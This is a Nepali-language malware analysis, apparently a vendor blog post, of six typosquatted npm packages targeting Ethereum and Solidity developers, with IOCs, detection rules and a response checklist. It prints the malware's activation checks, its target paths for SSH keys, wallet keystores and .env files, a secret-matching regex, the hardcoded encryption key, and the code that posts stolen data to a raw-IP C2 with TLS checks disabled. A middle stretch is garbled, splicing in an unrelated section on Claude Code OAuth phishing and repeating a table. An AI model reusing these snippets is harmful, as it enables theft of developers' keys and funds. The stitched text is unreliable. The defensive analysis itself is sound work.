EVMDeFi npm टाइपोस्क्वाटिंग आक्रमणले विकासकर्ता कुञ्जीहरू चोर्छ

EVM/DeFi npm टाइपोस्क्वाटिंग आक्रमणले विकासकर्ता कुञ्जीहरू चोर्छ

TL; ड

मे ६, २०२६ मा, एकल npm प्रकाशक, namikazesarada010206, Ethereum, Solidity, र DeFi विकासकर्ता इकोसिस्टमलाई लक्षित गर्दै छ वटा दुर्भावनापूर्ण प्याकेजहरू धकेलियो।

प्याकेजहरू, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, र web3-utils-core, लोकप्रिय Web3 टुलिङका लागि सहायक पुस्तकालयहरू जस्तो देखिने गरी डिजाइन गरिएका प्रशंसनीय नामहरू प्रयोग गरियो।

सबै छवटा प्याकेजहरूमा उस्तै थियो telemetry.js फाइल। फाइल SHA-256 सहित, क्लस्टरभरि बाइट-समान थियो:

SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1

मालवेयर स्थापनाको समयमा कार्यान्वयन हुँदैन। त्यहाँ कुनै preinstall or postinstall हुक। बरु, प्याकेज आयात गर्दा यो सक्रिय हुन्छ require().

त्यो विवरण महत्त्वपूर्ण छ।

इम्प्लान्टले विकासकर्ताले वास्तवमा प्याकेज प्रयोग नगरेसम्म पर्खन्छ। त्यसपछि यसले कार्यस्थान वास्तविक इथरियम / सोलिडिटी विकास वातावरण जस्तो देखिन्छ कि छैन भनेर जाँच गर्छ। यसले अल्केमी वा इन्फुरा कुञ्जीहरू, निजी कुञ्जीहरू, निमोनिक्स, डिप्लोयर कुञ्जीहरू, वा स्थानीय फाउन्ड्री निर्देशिका खोज्छ।

यदि होस्ट मिल्छ भने, चोरले SSH निजी कुञ्जीहरू, फाउन्ड्री / गेथ / ब्राउनी वालेट किस्टोरहरू सङ्कलन गर्दछ, .env* फाइलहरू, र संवेदनशील वातावरण चरहरू। यसले हार्डकोड गरिएको पासफ्रेज प्रयोग गरेर AES-256-GCM सँग बन्डललाई इन्क्रिप्ट गर्छ र TLS प्रमाणीकरण असक्षम पारेर कच्चा IPv4 C2 अन्त्य बिन्दुमा एक्सफिल्टरेट गर्छ।

Xygeni को मालवेयर अर्ली वार्निंग (MEW) प्रणालीले सबै छ प्याकेजहरूलाई दुर्भावनापूर्ण रूपमा पुष्टि गर्‍यो। npm रजिस्ट्री टेकडाउन रिपोर्ट बन्डल विचाराधीन छ।

क्लस्टर: छ प्याकेजहरू, एक प्रकाशक

प्रकाशक खाता namikazesarada010206 अप्रमाणित Gmail ठेगानामा लिङ्क गरिएको थियो namikazesarada010206@gmail.com.

अभियान मे ६, २०२६ मा एक-दिने प्रकाशनको रूपमा देखा पर्‍यो। सबै छ प्याकेजहरूलाई यस रूपमा संस्करण गरिएको थियो 1.0.0, शून्य रनटाइम निर्भरताहरू थिए, र केवल तीन फाइलहरू पठाइए:

package.json index.js telemetry.js

तिनीहरूले उही स्रोत भण्डार पनि घोषणा गरे:

https://github.com/harunosakura030303-maker/evmchain-config

पहिलो तीन प्याकेजहरू पहिलो प्रकाशनमा MEW स्क्यानरहरूले समातेका थिए। बाँकी तीनलाई प्रकाशकको ​​npm प्रोफाइलको विश्लेषक समीक्षा पछि जबरजस्ती फ्ल्याग गरिएको थियो। एक पटक उही बाइट-समान telemetry.js क्लस्टरभरि पुष्टि भए पनि, स्थिरताका कारण तिनीहरूलाई दुर्भावनापूर्ण रूपमा बन्द गरिएको थियो।

प्याकेज संस्करण npm प्रकाशित MEW टिकट प्रमाणित
भिएम-कोर 1.0.0 2026-05-06 01:38:44Z #51049 दुर्भावनापूर्ण
viem-utils-core का थप वस्तुहरू 1.0.0 2026-05-06 #51050 दुर्भावनापूर्ण
हार्डह्याट-कोर-उपयोगिताहरू 1.0.0 2026-05-06 #51051 दुर्भावनापूर्ण
ईभीएम-उपयोगिताहरू 1.0.0 2026-05-06 #51069 दुर्भावनापूर्ण, स्थिरता द्वारा
फाउन्ड्री-उपयोगिताहरू 1.0.0 2026-05-06 #51071 दुर्भावनापूर्ण, स्थिरता द्वारा
web3-utils-core मा जानुहोस् 1.0.0 2026-05-06 #51070 दुर्भावनापूर्ण, स्थिरता द्वारा

नामकरण रणनीति सरल तर प्रभावकारी छ।

यी प्याकेजहरूले सटीक अपस्ट्रीम नामहरूको प्रतिरूपण गर्दैनन्। बरु, तिनीहरूले प्रशंसनीय "उपयोगिता" प्रत्ययहरू प्रयोग गर्छन् जस्तै -core, -utils, र -utils-core। यसले तिनीहरूलाई Web3 टूलिङ नजिकै हेर्ने अपेक्षा गर्न सक्ने साथी पुस्तकालयहरू जस्तो देखिन्छ।

दुर्भावनापूर्ण प्याकेज वैध लक्ष्य
भिएम-कोर viem, एक लोकप्रिय Ethereum TypeScript क्लाइन्ट
viem-utils-core का थप वस्तुहरू भिएम
हार्डह्याट-कोर-उपयोगिताहरू हार्डह्याट, एक मुख्यधारा सोलिडिटी विकास वातावरण
ईभीएम-उपयोगिताहरू जेनेरिक EVM टूलिंग नेमस्पेस
फाउन्ड्री-उपयोगिताहरू फाउन्ड्री, एक सोलिडिटी टूलचेन
web3-utils-core मा जानुहोस् web3-utils, Web3.js सहयोगीहरू

यो "पूरक प्याकेज" ढाँचा हो: "म वास्तविक प्याकेज हुँ" होइन, तर "म वास्तविक प्याकेज वरिपरि एक उचित सहयोगी जस्तो देखिन्छु।"

DeFi विकासकर्ताहरू द्रुत गतिमा अघि बढिरहेका छन् भने, त्यो जोखिम सिर्जना गर्न पर्याप्त छ।

प्याकेज आयात गर्दा के हुन्छ?

आक्रमण श्रृंखला सानो, जानाजानी गरिएको, र क्रिप्टो-विकास वातावरणमा केन्द्रित छ।

कुनै स्थापना हुक छैन। बरु, प्रत्येक प्याकेजमा एउटा समावेश छ index.js जसले स्टब कार्यक्षमता निर्यात गर्छ र त्यसपछि मालिसियस टेलिमेट्री मोड्युल लोड गर्छ।

require('./telemetry').init();

यसको अर्थ मालवेयर पहिलो आयातमा सक्रिय हुन्छ।

त्यो आक्रमणकारीको लागि सञ्चालनको रूपमा उपयोगी छ। धेरै स्क्यानरहरू र स्यान्डबक्सहरू स्थापना-समय व्यवहारमा केन्द्रित हुन्छन्। यो प्याकेजले विकासकर्ता, निर्माण स्क्रिप्ट, परीक्षण सुइट, वा रनटाइम मार्गद्वारा वास्तवमा प्रयोग नभएसम्म पर्खन्छ।

सक्रियता गेट: वास्तविक Web3 विकासकर्ता कार्यस्थानहरूमा मात्र आगो लाग्छ

इम्प्लान्टको सबैभन्दा महत्त्वपूर्ण भाग सक्रियता गेट हो।

मालवेयरले सामान्यतया Ethereum / Solidity विकासकर्ता मेसिनहरूमा पाइने वातावरण चरहरूको जाँच गर्दछ:

const indicators = [   process.env.ALCHEMY_API_KEY,   process.env.INFURA_KEY,   process.env.PRIVATE_KEY,   process.env.MNEMONIC,   process.env.DEPLOYER_KEY, ].filter(Boolean);

यसले फाउन्ड्री स्थापना भएको देखिन्छ कि छैन भनेर पनि जाँच गर्छ:

fs.existsSync(path.join(os.homedir(), '.foundry'))

यदि कुनै पनि अवस्था सत्य छैन भने, प्रकार्य फर्कन्छ र केही गर्दैन।

यसले सामान्य विश्लेषण वातावरणमा प्याकेजलाई शान्त बनाउँछ। फाउन्ड्री, अल्केमी कुञ्जीहरू, इन्फुरा कुञ्जीहरू, निजी कुञ्जीहरू, वा मेमोनिक्स बिनाको स्यान्डबक्सले हानिरहित देखिने आयात देख्न सक्छ।

मिल्दो होस्टमा, मालवेयरले सङ्कलन गर्नु अघि ६० देखि ९० सेकेन्ड पर्खन्छ:

setTimeout(() => { try { _collect(); } catch {} },           60000 + Math.random() * 30000).unref();

ढिलाइले आयात र निष्कासन बीचको स्पष्ट सम्बन्धलाई कम गर्छ। .unref() यदि प्याकेज छोटो अवधिको स्क्रिप्टमा आयात गरिएको थियो भने call ले होस्ट प्रक्रियालाई सामान्य रूपमा बाहिर निस्कन दिन्छ।

यो कोलाहलपूर्ण तोडफोड र हडप्ने व्यवहार होइन। यो विकासकर्ता वातावरण चोरी गर्न लायक नभएसम्म दौडनबाट बच्नको लागि डिजाइन गरिएको लक्षित चोरी हो।

चोरले के सङ्कलन गर्छ

एक्टिभेसन गेट पास भएपछि, मालवेयरले Web3 विकासमा सबैभन्दा महत्त्वपूर्ण स्रोतहरूबाट सङ्कलन गर्दछ: निजी कुञ्जीहरू, वालेट कीस्टोरहरू, डिप्लोयमेन्ट क्रेडेन्सियलहरू, क्लाउड गोप्यहरू, npm टोकनहरू, र स्थानीय परियोजना कन्फिगरेसन।

मुहान के सङ्कलन गरिन्छ
process.env प्रयोग गर्न सकिन्छ कुनै पनि चर मिल्दो /टोकन|गोप्य|कुञ्जी|पास|प्रमाणीकरण|निजी|बीज|स्मरणात्मक|AWS|NPM|DEPLOY/i
~/.ssh/* पूर्ण फाइल सामग्री सहित PRIVATE KEY वा BEGIN OPENSSH भएका फाइलहरू
~/.फाउन्ड्री/किस्टोरहरू/* फाउन्ड्री वालेट किस्टोर फाइलहरू
~/.इथेरियम/किस्टोर/* गेथ वालेट किस्टोर फाइलहरू
~/.ब्राउनी/खाताहरू/* ब्राउनी वालेट किस्टोर फाइलहरू
${cwd}/.env पूर्ण फाइल सामग्री
${cwd}/.env.local पूर्ण फाइल सामग्री
${cwd}/.env.उत्पादन पूर्ण फाइल सामग्री
${cwd}/.env.विकास पूर्ण फाइल सामग्री
ओएस.होस्टनाम() होस्ट मेटाडेटा
क्रिप्टो.यादृच्छिकUUID() पीडित/सत्र पहिचानकर्ता
मिति.अब() सङ्कलन टाइमस्ट्याम्प
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com

ATTA टोकनहरू हुन्:

ATTA_ID 00400014144 ATTA_TOKEN 6478159937

हामीले टेलिमेट्री अपरेटरको आफ्नै एनालिटिक्स थियो वा छुट्टै मुद्रीकरण गरिएको च्यानल थियो भनेर पुष्टि गर्न सकेनौं। हामीले जाँच गरेका दुवै नमूनाहरूमा ATTA टोकनहरू समान छन्।

क्लस्टर बी: हेइबाई

claude.hk OAuth फिसिङ + ANTHROPIC_BASE_URL अपहरण

अप्रिल १ को नमुना अभियानको सबैभन्दा क्रूर, पहिलेको अंग हो।

heibai:2.1.88-claude.hk-4 द्वारा प्रकाशित भएको थियो wuguoqiangvip28, जुन ७, २०२५ मा सिर्जना गरिएको खाता। प्याकेजले स्पष्ट रूपमा वैध विरुद्धको संस्करण प्रस्तुत गर्‍यो 2.1.88 मानवजन्य रिलिज।

यसले CA-cert MITM सँग कुनै समस्या गर्दैन। बरु, यसले OAuth अन्त्य बिन्दुको बारेमा प्रयोगकर्तालाई झूट बोल्छ।

लीक भएको क्लाउड कोड स्रोतको माथि रहेको दुर्भावनापूर्ण थपहरू समावेश छन्:

मुहान के सङ्कलन गरिन्छ
process.env प्रयोग गर्न सकिन्छ कुनै पनि चर मिल्दो /टोकन|गोप्य|कुञ्जी|पास|प्रमाणीकरण|निजी|बीज|स्मरणात्मक|AWS|NPM|DEPLOY/i
~/.ssh/* पूर्ण फाइल सामग्री सहित PRIVATE KEY वा BEGIN OPENSSH भएका फाइलहरू
~/.फाउन्ड्री/किस्टोरहरू/* फाउन्ड्री वालेट किस्टोर फाइलहरू
~/.इथेरियम/किस्टोर/* गेथ वालेट किस्टोर फाइलहरू
~/.ब्राउनी/खाताहरू/* ब्राउनी वालेट किस्टोर फाइलहरू
${cwd}/.env पूर्ण फाइल सामग्री
${cwd}/.env.local पूर्ण फाइल सामग्री
${cwd}/.env.उत्पादन पूर्ण फाइल सामग्री
${cwd}/.env.विकास पूर्ण फाइल सामग्री
ओएस.होस्टनाम() होस्ट मेटाडेटा
क्रिप्टो.यादृच्छिकUUID() पीडित/सत्र पहिचानकर्ता
मिति.अब() सङ्कलन टाइमस्ट्याम्प

लक्षित सूची अत्यन्त विशिष्ट छ। यो सामान्य ब्राउजर चोरी वा व्यापक प्रमाण स्क्र्यापिङ होइन। यो Ethereum अनुप्रयोगहरू निर्माण, परीक्षण, तैनाथ, वा सञ्चालन गर्ने विकासकर्ताहरूको लागि लक्षित छ।

फाउन्ड्री, गेथ, र ब्राउनी किस्टोरहरूको समावेश विशेष गरी महत्त्वपूर्ण छ। यी फाइलहरूले वालेट वा डिप्लोयमेन्ट पहिचानहरूमा प्रत्यक्ष पहुँच प्रतिनिधित्व गर्न सक्छन्। यदि आक्रमणकारीले तिनीहरूलाई पासवर्ड, निमोनिक्स, वा वातावरणीय गोप्यहरूसँग जोड्न सक्छ भने, तिनीहरूले कोष सार्न, डिप्लोयर्सको प्रतिरूपण गर्न, वा स्मार्ट अनुबंध सञ्चालनहरू सम्झौता गर्न सक्षम हुन सक्छन्।

एक्सफिल्ट्रेसन अघि इन्क्रिप्शन

मालवेयरले सङ्कलन गरिएको डेटा पठाउनु अघि इन्क्रिप्ट गर्छ।

const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv);

हार्डकोड गरिएको पासफ्रेज यो हो:

a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d

अन्तिम पेलोड JSON को रूपमा बेरिएको छ:

{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"}

इन्क्रिप्शनले मालवेयरलाई आफैंमा अझ उन्नत बनाउँदैन। यद्यपि, यसले नेटवर्क निरीक्षणलाई अझ कठिन बनाउँछ। बाहिर निस्कने डिफेन्डरले JSON पेलोड देख्नेछ, तर चोरी भएका कुञ्जीहरू, वालेट फाइलहरू, वा .env हार्डकोड गरिएको पासफ्रेज र डिक्रिप्शन तर्क बिना सामग्रीहरू।

कच्चा IPv4 C2 मा एक्सफिल्ट्रेसन

एक्सफिल्ट्रेसन मार्ग हार्डकोड गरिएको छ:

const req = https.request({   hostname: '76.13.37.80', port: 8443,   path: '/api/v1/telemetry', method: 'POST',   headers: { 'Content-Type': 'application/json', ... },   rejectUnauthorized: false, timeout: 8000, }, () => {});

मालवेयरले निम्नमा डेटा पठाउँछ:

https://76.13.37.80:8443/api/v1/telemetry

दुई विवरणहरू स्पष्ट छन्।

पहिलो, C2 डोमेन नभई कच्चा IPv4 ठेगाना हो। यसले डोमेन दर्ताको आवश्यकतालाई हटाउँछ र केही डोमेन-आधारित पत्ता लगाउनबाट बचाउँछ।

दोस्रो, TLS प्रमाणीकरण निम्न अवस्थामा असक्षम पारिएको छ:

rejectUnauthorized: false

यसले मालवेयरलाई स्व-हस्ताक्षरित प्रमाणपत्रहरू सहित कुनै पनि प्रमाणपत्र स्वीकार गर्न अनुमति दिन्छ। अर्को शब्दमा, आक्रमणकारीले वैध सार्वजनिक प्रमाणपत्रको आवश्यकता बिना नै इन्क्रिप्टेड ट्रान्सपोर्ट प्राप्त गर्दछ।

त्यहाँ कुनै पुन: प्रयास तर्क छैन र कुनै फलब्याक होस्ट छैन। त्रुटिहरू चुपचाप निलिन्छन्। यदि C2 अफलाइन छ वा पहुँचयोग्य छैन भने यसले प्याकेजलाई शान्त राख्छ।

यो अभियान किन महत्त्वपूर्ण छ

विकासकर्ताहरूलाई लक्षित धेरैजसो दुर्भावनापूर्ण npm प्याकेजहरू व्यापक प्रमाणहरू पछ्याउँछन्: npm टोकनहरू, AWS कुञ्जीहरू, GitHub टोकनहरू, वा .npmrc फाइलहरू।

यो अभियानले लक्ष्यलाई साँघुरो बनाउँछ।

यसले मेसिन इथरियम वा सोलिडिटी विकासकर्ताको हो भन्ने संकेतहरू खोज्छ। त्यसपछि यसले त्यो वातावरणमा महत्त्वपूर्ण हुने सम्पत्तिहरू ठ्याक्कै तान्छ: वालेट किस्टोरहरू, निजी कुञ्जीहरू, निमोनिक्स, डिप्लोयर कुञ्जीहरू, .env फाइलहरू, र SSH कुञ्जीहरू।

यसले अभियानलाई सामान्य npm चोर भन्दा Web3 टोलीहरूको लागि बढी खतरनाक बनाउँछ।

सफल संक्रमणले निम्न कुराहरू प्रकट गर्न सक्छ:

  • डिप्लोयमेन्ट वालेटहरू
  • स्मार्ट सम्झौता प्रशासक कुञ्जीहरू
  • RPC प्रदायक कुञ्जीहरू
  • क्लाउड डिप्लोयमेन्ट प्रमाणपत्रहरू
  • npm प्रकाशन टोकनहरू
  • विकासकर्ता वा निर्माण पूर्वाधारमा SSH पहुँच
  • परियोजना गोप्यहरू भण्डारण गरिएका छन् .env फाइलहरू
  • फाउन्ड्री, गेथ, वा ब्राउनीको लागि वालेट किस्टोरहरू

प्याकेज नामहरूले स्पष्ट सामाजिक इन्जिनियरिङ पनि देखाउँछन्। तिनीहरूले परिचित उपकरण नामहरू मार्फत Web3 विकासकर्ता इकोसिस्टमलाई लक्षित गर्छन्: viem, hardhat, foundry, evm, र web3.

अभिनेताले वास्तविक परियोजनाहरूसँग सम्झौता गर्नुपर्दैन। उनीहरूलाई केवल एक विकासकर्ता चाहिन्छ जसले उचित साथी प्याकेज जस्तो देखिने कुरा स्थापना गर्दछ।

सम्झौता र पत्ता लगाउने सूचकहरू

प्याकेजहरू र प्रकाशक
क्षेत्र मूल्य
npm प्रकाशक नामिकाजेसरदा०१०२०६
प्रकाशकको ​​इमेल namikazesarada010206@gmail.com मा सम्पर्क गर्नुहोस्
इमेल प्रमाणित होइन
SCM प्रमाणित होइन
प्रतिष्ठा स्कोर 1.0
प्याकेजहरू viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, web3-utils-core
संस्करण सबै 1.0.0
स्रोत भण्डार https://github.com/harunosakura030303-maker/evmchain-config
दुर्भावनापूर्ण पुष्टि भयो सबै छ प्याकेजहरू
नेटवर्क
प्रकार मूल्य
C2 अन्त्यबिन्दु https://76.13.37.80:8443/api/v1/telemetry
C2 आईपी 76.13.37.80
C2 पोर्ट 8443/tcp
TLS व्यवहार अस्वीकार गर्नुहोस्अनधिकृत: गलत
पेलोड स्किमा {"v":2,"iv": "घ": "ट": }
फाइलहरू र ह्यासहरू
प्रकार मूल्य
telemetry.js SHA-256 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1
प्याकेज लेआउट package.json, index.js, telemetry.js
फाइल गणना 3
अनुमानित कुल आकार 3.4 KB

सक्रियता संकेतहरू

मालवेयरले यी वातावरण चरहरूको जाँच गर्दछ:

ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY

यसले निम्न कुराहरूको पनि जाँच गर्छ:

~/.foundry/

लक्षित होस्ट पथहरू

~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development

सङ्कलन रेजेक्स

/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i

पत्ता लगाउने नोटहरू

पूर्ण व्यवहारिक विश्लेषणको आवश्यकता बिना नै धेरै नियमहरूले यो अभियानलाई समात्छन्।

पहिले, छ वटा दुर्भावनापूर्ण प्याकेज नामहरूको लागि लकफाइलहरू स्क्यान गर्नुहोस्:

viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core

कुनै पनि मिल्दोजुल्दो package-lock.json, yarn.lock, pnpm-lock.yamlवा node_modules इतिहासलाई गम्भीर घटनाको रूपमा लिनुपर्छ।

दोस्रो, वालेट किस्टोर मार्गहरू पढ्ने Node.js प्रक्रियाहरूको लागि मनिटर:

~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/

यो सहायक निर्भरताको रूपमा आयात गरिएको प्याकेजको लागि विरलै वैध व्यवहार हो। आउटबाउन्ड नेटवर्क गतिविधि पछि यो विशेष गरी शंकास्पद हुन्छ।

तेस्रो, HTTPS जडानहरूमा ब्लक वा अलर्ट गर्नुहोस्:

76.13.37.80:8443

विशेष गरी जब अनुरोध मार्ग यो हो:

/api/v1/telemetry

चौथो, यी विशेषताहरू संयोजन गर्ने npm प्याकेजहरू खोज्नुहोस्:

  • नयाँ वा कम प्रतिष्ठा भएका प्रकाशक
  • अप्रमाणित जीमेल खाता
  • Web3-सम्बन्धित प्याकेज नाम
  • कुनै अर्थपूर्ण भण्डार इतिहास छैन
  • सानो प्याकेज लेआउट
  • index.js जसले टेलिमेट्री वा सहयोगी फाइल लोड गर्छ
  • कुनै रनटाइम निर्भरता छैन
  • संवेदनशील वातावरण-चर संग्रह
  • वालेट किस्टोर पहुँच

यो ढाँचा एकल IOC भन्दा बढी उपयोगी छ किनभने अर्को प्याकेजले IP ठेगाना परिवर्तन गर्न सक्छ तर उही लक्ष्यीकरण तर्क राख्न सक्छ।

सम्झौता प्रतिक्रिया चेकलिस्ट

यदि कुनै विकासकर्ताले छवटा प्याकेजहरू मध्ये एउटा प्रयोग गरेको छ र तिनीहरूको वातावरण सक्रियता गेटसँग मेल खान्छ भने, कार्यस्थानलाई सम्झौता भएको मान्नुहोस्।

त्यसमा फाउन्ड्री जडान गरिएका मेसिनहरू, वातावरणमा अल्केमी वा इन्फुरा कुञ्जीहरू, निजी कुञ्जीहरू, निमोनिक्स, वा डिप्लोयर कुञ्जीहरू समावेश छन्।

सिफारिस गरिएको प्रतिक्रिया:

  • नेटवर्कबाट होस्ट विच्छेद गर्नुहोस्।
  • संरक्षण गर्नुहोस् node_modules, लकफाइलहरू, शेल इतिहास, र फोरेन्सिकका लागि सान्दर्भिक लगहरू।
  • प्रत्येक SSH किपेयरलाई तल घुमाउनुहोस् ~/.ssh/.
  • प्रत्येक किस्टोरको लागि वालेट कुञ्जीहरू घुमाउनुहोस् ~/.foundry, ~/.ethereum, र ~/.brownie.
  • नयाँ वालेटमा रकम सार्नुहोस्।
  • भण्डारण गरिएका हरेक गोप्य कुरा घुमाउनुहोस् .env* विकासकर्ताले काम गर्ने भण्डारहरूमा रहेका फाइलहरू।
  • AWS कुञ्जीहरू, npm टोकनहरू, डिप्लोय टोकनहरू, API कुञ्जीहरू, निजी कुञ्जीहरू, बीजहरू, र मेमोनिक्स सहित सङ्कलन रेजेक्ससँग मिल्ने वातावरणीय रहस्यहरू घुमाउनुहोस्।
  • प्याकेज पहिलो पटक स्थापना भएदेखि अडिट क्लाउड, एनपीएम, गिटहब, आरपीसी प्रदायक, र ब्लकचेन गतिविधि।
  • पुन: प्रयोग गर्नु अघि कार्यस्थानको पुन: छवि बनाउनुहोस्।

रक्षकहरूले के लैजानुपर्छ

यो अभियानले उच्च-मूल्य विकासकर्ता इकोसिस्टम वरिपरि npm टाइपोस्क्वाटिंग कसरी विकसित हुँदैछ भनेर देखाउँछ।

अभिनेतालाई दृढता चाहिँदैनथ्यो। उनीहरूलाई अस्पष्टता चाहिँदैनथ्यो। उनीहरूलाई स्थापना-समय कार्यान्वयन पनि चाहिँदैनथ्यो।

बरु, तिनीहरूले तीनवटा कुरामा भर परे:

  • प्रशंसनीय Web3 प्याकेज नामहरू
  • वास्तविक क्रिप्टो-विकास मेसिनहरूमा मात्र सक्रियता
  • इथरियम विकासकर्ताहरूको लागि सबैभन्दा महत्त्वपूर्ण फाइलहरू र गोप्य कुराहरूको प्रत्यक्ष चोरी

यसले गर्दा अभियानलाई व्यापक स्क्यानिङमा छुटाउन सजिलो हुन्छ र सही वातावरणमा अवतरण गर्दा खतरनाक हुन्छ।

Web3 टोलीहरूको लागि, पाठ स्पष्ट छ: निर्भरता नामहरूलाई तपाईंको खतरा मोडेलको भागको रूपमा व्यवहार गर्नुहोस्। हानिरहित सहयोगी जस्तो देखिने प्याकेज अझै पनि वालेट सम्झौताको सबैभन्दा छोटो बाटो बन्न सक्छ।

npm रजिस्ट्रीमा रिपोर्ट गरियो। प्रकाशक खाता र प्याकेजहरू हटाइएपछि हामी यो पोस्ट अपडेट गर्नेछौं।

sca-उपकरण-सफ्टवेयर-रचना-विश्लेषण-उपकरणहरू
आफ्नो सफ्टवेयर जोखिमहरूलाई प्राथमिकता दिनुहोस्, सुधार गर्नुहोस् र सुरक्षित गर्नुहोस्
आफ्नो नि:शुल्क खाता पाउनुहोस्।
कुनै क्रेडिट कार्ड आवश्यक छैन।

आफ्नो सफ्टवेयर विकास र डेलिभरी सुरक्षित गर्नुहोस्

Xygeni उत्पादन सुइटको साथ